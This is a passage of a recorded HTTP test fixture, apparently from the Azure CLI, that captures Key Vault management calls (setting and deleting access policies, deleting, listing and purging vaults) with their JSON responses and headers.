'{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002","name":"cli-test-kv-mgmt-000002","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{},"properties":{"sku":{"family":"A","name":"premium"},"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","networkAcls":{"bypass":"AzureServices","defaultAction":"Deny","ipRules":[],"virtualNetworkRules":[]},"accessPolicies":[{"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","objectId":"9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa","permissions":{"keys":["wrapKey","get"],"secrets":["get","list","set","delete","backup","restore","recover"],"certificates":["get","list","delete","create","import","update","managecontacts","getissuers","listissuers","setissuers","deleteissuers","manageissuers","recover"],"storage":["get","list","delete","set","update","regeneratekey","setsas","listsas","getsas","deletesas"]}}],"enabledForDeployment":true,"enabledForDiskEncryption":true,"enabledForTemplateDeployment":true,"enableSoftDelete":true,"softDeleteRetentionInDays":17,"enableRbacAuthorization":false,"vaultUri":"https://cli-test-kv-mgmt-000002.vault.azure.net/","provisioningState":"Succeeded"}}' headers: cache-control: - no-cache content-length: - '1295' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:21:43 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains transfer-encoding: - chunked vary: - Accept-Encoding x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: '{"location": "westus", "tags": {}, "properties": {"tenantId": "54826b22-38d6-4fb2-bad9-b7b93a3e9c5a", "sku": {"family": "A", "name": "premium"}, "accessPolicies": [{"tenantId": "54826b22-38d6-4fb2-bad9-b7b93a3e9c5a", "objectId": "9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa", "permissions": {"keys": ["wrapKey", "get"], "secrets": ["get", "list", "set", "delete", "backup", "restore", "recover"], "certificates": ["list", "get"], "storage": ["get", "list", "delete", "set", "update", "regeneratekey", "setsas", "listsas", "getsas", "deletesas"]}}], "vaultUri": "https://cli-test-kv-mgmt-000002.vault.azure.net/", "enabledForDeployment": true, "enabledForDiskEncryption": true, "enabledForTemplateDeployment": true, "enableSoftDelete": true, "softDeleteRetentionInDays": 17, "enableRbacAuthorization": false, "networkAcls": {"bypass": "AzureServices", "defaultAction": "Deny", "ipRules": [], "virtualNetworkRules": []}}}' headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault set-policy Connection: - keep-alive Content-Length: - '913' Content-Type: - application/json; charset=utf-8 ParameterSetName: - -g -n --object-id --certificate-permissions User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: PUT uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002?api-version=2019-09-01 response: body: string: '{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002","name":"cli-test-kv-mgmt-000002","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{},"properties":{"sku":{"family":"A","name":"premium"},"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","networkAcls":{"bypass":"AzureServices","defaultAction":"Deny","ipRules":[],"virtualNetworkRules":[]},"accessPolicies":[{"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","objectId":"9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa","permissions":{"keys":["wrapKey","get"],"secrets":["get","list","set","delete","backup","restore","recover"],"certificates":["list","get"],"storage":["get","list","delete","set","update","regeneratekey","setsas","listsas","getsas","deletesas"]}}],"enabledForDeployment":true,"enabledForDiskEncryption":true,"enabledForTemplateDeployment":true,"enableSoftDelete":true,"softDeleteRetentionInDays":17,"enableRbacAuthorization":false,"vaultUri":"https://cli-test-kv-mgmt-000002.vault.azure.net/","provisioningState":"Succeeded"}}' headers: cache-control: - no-cache content-length: - '1160' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:21:43 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains transfer-encoding: - chunked vary: - Accept-Encoding x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-ms-ratelimit-remaining-subscription-writes: - '1199' x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault delete-policy Connection: - keep-alive ParameterSetName: - -g -n --object-id User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002?api-version=2019-09-01 response: body: string: '{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002","name":"cli-test-kv-mgmt-000002","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{},"properties":{"sku":{"family":"A","name":"premium"},"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","networkAcls":{"bypass":"AzureServices","defaultAction":"Deny","ipRules":[],"virtualNetworkRules":[]},"accessPolicies":[{"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","objectId":"9ac02ab3-5061-4ec6-a3d8-2cdaa5f29efa","permissions":{"keys":["wrapKey","get"],"secrets":["get","list","set","delete","backup","restore","recover"],"certificates":["list","get"],"storage":["get","list","delete","set","update","regeneratekey","setsas","listsas","getsas","deletesas"]}}],"enabledForDeployment":true,"enabledForDiskEncryption":true,"enabledForTemplateDeployment":true,"enableSoftDelete":true,"softDeleteRetentionInDays":17,"enableRbacAuthorization":false,"vaultUri":"https://cli-test-kv-mgmt-000002.vault.azure.net/","provisioningState":"Succeeded"}}' headers: cache-control: - no-cache content-length: - '1160' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:21:46 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains transfer-encoding: - chunked vary: - Accept-Encoding x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: '{"location": "westus", "tags": {}, "properties": {"tenantId": "54826b22-38d6-4fb2-bad9-b7b93a3e9c5a", "sku": {"family": "A", "name": "premium"}, "accessPolicies": [], "vaultUri": "https://cli-test-kv-mgmt-000002.vault.azure.net/", "enabledForDeployment": true, "enabledForDiskEncryption": true, "enabledForTemplateDeployment": true, "enableSoftDelete": true, "softDeleteRetentionInDays": 17, "enableRbacAuthorization": false, "networkAcls": {"bypass": "AzureServices", "defaultAction": "Deny", "ipRules": [], "virtualNetworkRules": []}}}' headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault delete-policy Connection: - keep-alive Content-Length: - '538' Content-Type: - application/json; charset=utf-8 ParameterSetName: - -g -n --object-id User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: PUT uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002?api-version=2019-09-01 response: body: string: '{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002","name":"cli-test-kv-mgmt-000002","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{},"properties":{"sku":{"family":"A","name":"premium"},"tenantId":"54826b22-38d6-4fb2-bad9-b7b93a3e9c5a","networkAcls":{"bypass":"AzureServices","defaultAction":"Deny","ipRules":[],"virtualNetworkRules":[]},"accessPolicies":[],"enabledForDeployment":true,"enabledForDiskEncryption":true,"enabledForTemplateDeployment":true,"enableSoftDelete":true,"softDeleteRetentionInDays":17,"enableRbacAuthorization":false,"vaultUri":"https://cli-test-kv-mgmt-000002.vault.azure.net/","provisioningState":"Succeeded"}}' headers: cache-control: - no-cache content-length: - '814' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:21:46 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains transfer-encoding: - chunked vary: - Accept-Encoding x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-ms-ratelimit-remaining-subscription-writes: - '1199' x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault delete Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resources?$filter=resourceType%20eq%20%27Microsoft.KeyVault%2Fvaults%27&api-version=2015-11-01 response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/azure-cli-test-rg/providers/Microsoft.KeyVault/vaults/azureclitest-vault","name":"azureclitest-vault","type":"Microsoft.KeyVault/vaults","location":"eastus","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bim-kv5","name":"bim-kv5","type":"Microsoft.KeyVault/vaults","location":"eastus2euap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bim-kv8","name":"bim-kv8","type":"Microsoft.KeyVault/vaults","location":"centraluseuap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bim-kv-666","name":"bim-kv-666","type":"Microsoft.KeyVault/vaults","location":"centraluseuap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bim-sd-test1","name":"bim-sd-test1","type":"Microsoft.KeyVault/vaults","location":"eastus2euap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bim-sd-test2","name":"bim-sd-test2","type":"Microsoft.KeyVault/vaults","location":"eastus2euap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bim-sd-test3","name":"bim-sd-test3","type":"Microsoft.KeyVault/vaults","location":"eastus2euap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bim-sd-test4","name":"bim-sd-test4","type":"Microsoft.KeyVault/vaults","location":"eastus2euap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bimkvTest","name":"bimkvTest","type":"Microsoft.KeyVault/vaults","location":"northcentralus","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bimtrack2test","name":"bimtrack2test","type":"Microsoft.KeyVault/vaults","location":"eastus2euap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim-rg/providers/Microsoft.KeyVault/vaults/bimtrack2test2","name":"bimtrack2test2","type":"Microsoft.KeyVault/vaults","location":"eastus2euap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/bim_pl_test_rg/providers/Microsoft.KeyVault/vaults/bimplkv","name":"bimplkv","type":"Microsoft.KeyVault/vaults","location":"eastus","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002","name":"cli-test-kv-mgmt-000002","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/feng-cli-rg/providers/Microsoft.KeyVault/vaults/fengws1keyvault5d9d94ec6","name":"fengws1keyvault5d9d94ec6","type":"Microsoft.KeyVault/vaults","location":"eastasia","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/feng-cli-rg/providers/Microsoft.KeyVault/vaults/fengwskeyvault7b56d2ee87","name":"fengwskeyvault7b56d2ee87","type":"Microsoft.KeyVault/vaults","location":"westus2","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/fytest/providers/Microsoft.KeyVault/vaults/vault4848","name":"vault4848","type":"Microsoft.KeyVault/vaults","location":"centraluseuap","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/jlrg1/providers/Microsoft.KeyVault/vaults/jlkv0227","name":"jlkv0227","type":"Microsoft.KeyVault/vaults","location":"southeastasia","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/jlrg1/providers/Microsoft.KeyVault/vaults/jlkv0309","name":"jlkv0309","type":"Microsoft.KeyVault/vaults","location":"southeastasia","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/yeming/providers/Microsoft.KeyVault/vaults/yeming","name":"yeming","type":"Microsoft.KeyVault/vaults","location":"eastasia","tags":{}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/zhoxing-test/providers/Microsoft.KeyVault/vaults/zhoxingtest9393","name":"zhoxingtest9393","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{"hidden-DevTestLabs-LabUId":"6e279161-d008-42b7-90a1-6801fc4bc4ca","CreatedBy":"DevTestLabs"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/zhoxing-test/providers/Microsoft.KeyVault/vaults/zhoxingtest9ac53638","name":"zhoxingtest9ac53638","type":"Microsoft.KeyVault/vaults","location":"westus","tags":{"hidden-DevTestLabs-LabUId":"6e279161-d008-42b7-90a1-6801fc4bc4ca","CreatedBy":"DevTestLabs"}}]}' headers: cache-control: - no-cache content-length: - '5021' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:21:48 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault delete Connection: - keep-alive Content-Length: - '0' ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: DELETE uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults/cli-test-kv-mgmt-000002?api-version=2019-09-01 response: body: string: '' headers: cache-control: - no-cache content-length: - '0' date: - Mon, 23 Mar 2020 10:21:53 GMT expires: - '-1' pragma: - no-cache server: - Microsoft-IIS/10.0 strict-transport-security: - max-age=31536000; includeSubDomains x-aspnet-version: - 4.0.30319 x-content-type-options: - nosniff x-ms-keyvault-service-version: - 1.1.0.275 x-ms-ratelimit-remaining-subscription-deletes: - '14999' x-powered-by: - ASP.NET status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list Connection: - keep-alive ParameterSetName: - -g User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_mgmt000001/providers/Microsoft.KeyVault/vaults?api-version=2019-09-01 response: body: string: '{"value":[]}' headers: cache-control: - no-cache content-length: - '12' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:21:54 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault purge Connection: - keep-alive ParameterSetName: - -n User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01 response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/northcentralus/deletedVaults/yugangwncu-kv","name":"yugangwncu-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/yugangwncu/providers/Microsoft.KeyVault/vaults/yugangwncu-kv","location":"northcentralus","tags":{},"deletionDate":"2020-01-04T17:11:31Z","scheduledPurgeDate":"2020-04-03T17:11:31Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus/deletedVaults/cmk-test-keyvaultjnsfjh6","name":"cmk-test-keyvaultjnsfjh6","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgni6glhhbkokgvg4iwzohowsc2smndkbz467a7hg26dvpc7sdanz3p5xhbpeyecbti/providers/Microsoft.KeyVault/vaults/cmk-test-keyvaultjnsfjh6","location":"eastus","tags":{},"deletionDate":"2020-03-20T18:06:34Z","scheduledPurgeDate":"2020-06-18T18:06:34Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus/deletedVaults/cmk-test-keyvaultfsthqtt","name":"cmk-test-keyvaultfsthqtt","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rggdmpmbpy6ewfjuhaozsszfteklivu4jhnaiqszcrxh3onvrmv5ye6z6nx7lso3jsa/providers/Microsoft.KeyVault/vaults/cmk-test-keyvaultfsthqtt","location":"eastus","tags":{},"deletionDate":"2020-03-19T07:53:34Z","scheduledPurgeDate":"2020-06-17T07:53:34Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus/deletedVaults/cmk-test-keyvaultfm6wjrk","name":"cmk-test-keyvaultfm6wjrk","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgwtx47ni5hkrbbmxddmqumh5mgmrcbrtcly2ukdtyhxtrbya2hjpw5kbreowxstb7u/providers/Microsoft.KeyVault/vaults/cmk-test-keyvaultfm6wjrk","location":"eastus","tags":{},"deletionDate":"2020-03-13T18:06:12Z","scheduledPurgeDate":"2020-06-11T18:06:12Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus/deletedVaults/jlkv0311","name":"jlkv0311","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/jlrg/providers/Microsoft.KeyVault/vaults/jlkv0311","location":"eastus","tags":{},"deletionDate":"2020-03-11T14:11:34Z","scheduledPurgeDate":"2020-03-23T14:11:34Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus/deletedVaults/cmk-test-keyvault5sqfx2x","name":"cmk-test-keyvault5sqfx2x","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgmaeu767ym7nzvi3vj7xwbxxwidfk53lnm56h7zmeubkfbmpl4uwokt34w4hqdcl4n/providers/Microsoft.KeyVault/vaults/cmk-test-keyvault5sqfx2x","location":"eastus","tags":{},"deletionDate":"2020-03-06T18:14:23Z","scheduledPurgeDate":"2020-06-04T18:14:23Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westeurope/deletedVaults/kv-ssl-test22wtltn3c","name":"kv-ssl-test22wtltn3c","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgwikdo6eqepisjaezxd72ki4rvhirjaqy7tt2g7nb76i4vchoxxarcxcsna5kmw4cn/providers/Microsoft.KeyVault/vaults/kv-ssl-test22wtltn3c","location":"westeurope","tags":{},"deletionDate":"2020-03-20T18:10:08Z","scheduledPurgeDate":"2020-06-18T18:10:08Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westeurope/deletedVaults/kv-ssl-test4nzdhgcpc","name":"kv-ssl-test4nzdhgcpc","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgylrzgouyxoqbo46qlxquz2ibbb47efjjjzoyhyx56diin333y2bv4tnyzvdnhks5j/providers/Microsoft.KeyVault/vaults/kv-ssl-test4nzdhgcpc","location":"westeurope","tags":{},"deletionDate":"2020-03-19T07:58:01Z","scheduledPurgeDate":"2020-06-17T07:58:01Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westeurope/deletedVaults/kv-ssl-testahd35d2h7","name":"kv-ssl-testahd35d2h7","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgfi6unrzrgex22etdwxy5wixos3xp73m6q3ckrschl5e673yt2hbupuoel676kf6cf/providers/Microsoft.KeyVault/vaults/kv-ssl-testahd35d2h7","location":"westeurope","tags":{},"deletionDate":"2020-03-13T18:42:18Z","scheduledPurgeDate":"2020-06-11T18:42:18Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westeurope/deletedVaults/kv-ssl-testdgnzfntdg","name":"kv-ssl-testdgnzfntdg","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rggvpg6n5vl3zdrlrhd2pheycnoaakok5ggno66zmdqitni7hdbq3rbwcgspssihmmm/providers/Microsoft.KeyVault/vaults/kv-ssl-testdgnzfntdg","location":"westeurope","tags":{},"deletionDate":"2020-03-06T18:54:05Z","scheduledPurgeDate":"2020-06-04T18:54:05Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastasia/deletedVaults/xxj-jedi-1","name":"xxj-jedi-1","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/xiaojianxu/providers/Microsoft.KeyVault/vaults/xxj-jedi-1","location":"eastasia","tags":{},"deletionDate":"2020-03-06T15:27:15Z","scheduledPurgeDate":"2020-06-04T15:27:15Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southeastasia/deletedVaults/test-kv-kv","name":"test-kv-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/test/providers/Microsoft.KeyVault/vaults/test-kv-kv","location":"southeastasia","tags":{},"deletionDate":"2020-01-12T17:14:55Z","scheduledPurgeDate":"2020-04-11T17:14:55Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2/deletedVaults/cli-test-kv-sd-ef7h5yc4i","name":"cli-test-kv-sd-ef7h5yc4i","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_sd3sy6wwddyn7upf5kz7biac6otb42h5lukakt4f4zvdfwmm4tv3jeslq/providers/Microsoft.KeyVault/vaults/cli-test-kv-sd-ef7h5yc4i","location":"eastus2","tags":{},"deletionDate":"2020-03-21T14:45:20Z","scheduledPurgeDate":"2020-06-19T14:45:20Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2/deletedVaults/cli-test-kv-sd-opq6hvmd5","name":"cli-test-kv-sd-opq6hvmd5","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_sdg4wncg7apey6kkl45mgws5a5w2w72nxjsxdli5f5fyaf77nqstt5f7y/providers/Microsoft.KeyVault/vaults/cli-test-kv-sd-opq6hvmd5","location":"eastus2","tags":{},"deletionDate":"2020-03-10T13:29:53Z","scheduledPurgeDate":"2020-06-08T13:29:53Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2/deletedVaults/cli-test-kv-sd-sg2xy2ttq","name":"cli-test-kv-sd-sg2xy2ttq","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_sd4ed2sssomniuokdoozvpwowez2cn3ysq62iz5qbll24fs63xvrhkbo6/providers/Microsoft.KeyVault/vaults/cli-test-kv-sd-sg2xy2ttq","location":"eastus2","tags":{},"deletionDate":"2020-03-10T13:18:34Z","scheduledPurgeDate":"2020-06-08T13:18:34Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2/deletedVaults/cli-test-kv-sd-unajpf66i","name":"cli-test-kv-sd-unajpf66i","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_sdtaj3w3eefnjm4o5twxj5xf3zlqjgofooerqpavl7lfmdfivm3c72zyk/providers/Microsoft.KeyVault/vaults/cli-test-kv-sd-unajpf66i","location":"eastus2","tags":{},"deletionDate":"2020-03-10T12:57:56Z","scheduledPurgeDate":"2020-06-08T12:57:56Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2/deletedVaults/cli-test-kv-sd-vprnoufc7","name":"cli-test-kv-sd-vprnoufc7","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_sdcscjau5ojn3wrsihkgo5qkppsib4st3u7oj2l3fu5sspzhlxhls3jre/providers/Microsoft.KeyVault/vaults/cli-test-kv-sd-vprnoufc7","location":"eastus2","tags":{},"deletionDate":"2020-03-10T12:48:26Z","scheduledPurgeDate":"2020-06-08T12:48:26Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centralus/deletedVaults/ygpl123-kv","name":"ygpl123-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/ygpl123/providers/Microsoft.KeyVault/vaults/ygpl123-kv","location":"centralus","tags":{},"deletionDate":"2020-01-29T17:11:24Z","scheduledPurgeDate":"2020-04-28T17:11:24Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centralus/deletedVaults/yg77778-kv","name":"yg77778-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/yg77778/providers/Microsoft.KeyVault/vaults/yg77778-kv","location":"centralus","tags":{},"deletionDate":"2020-01-28T17:11:25Z","scheduledPurgeDate":"2020-04-27T17:11:25Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centralus/deletedVaults/testcmdportal2-kv","name":"testcmdportal2-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-